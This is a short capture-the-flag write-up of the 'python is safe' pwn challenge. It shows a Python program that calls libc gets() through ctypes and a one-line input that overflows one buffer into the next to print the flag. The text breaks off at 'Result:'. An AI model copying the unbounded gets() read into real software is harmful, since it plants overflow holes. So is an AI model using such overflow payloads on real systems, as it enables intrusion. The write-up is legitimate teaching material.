# HCMUS-CTF # Pwn: python is safe The challenge's attachment file: [main.py](https://anonfiles.com/EfD2o1q8z9/main_py) # First look Here is what the file looks like: ```c++= #!/usr/bin/env python3 from ctypes import CDLL, c_buffer libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6') buf1 = c_buffer(512) buf2 = c_buffer(512) libc.gets(buf1) if b'HCMUS-CTF' in bytes(buf2): print(open('./flag.txt', 'r').read()) ``` It is not hard to see that the program takes an unbounded input for `buf1` by using `libc.gets()` function, making it vulnerable to a buffer overflow attack. Input: ```j= python3 -c "print('1'*512+'HCMUS-CTF')" ``` Result: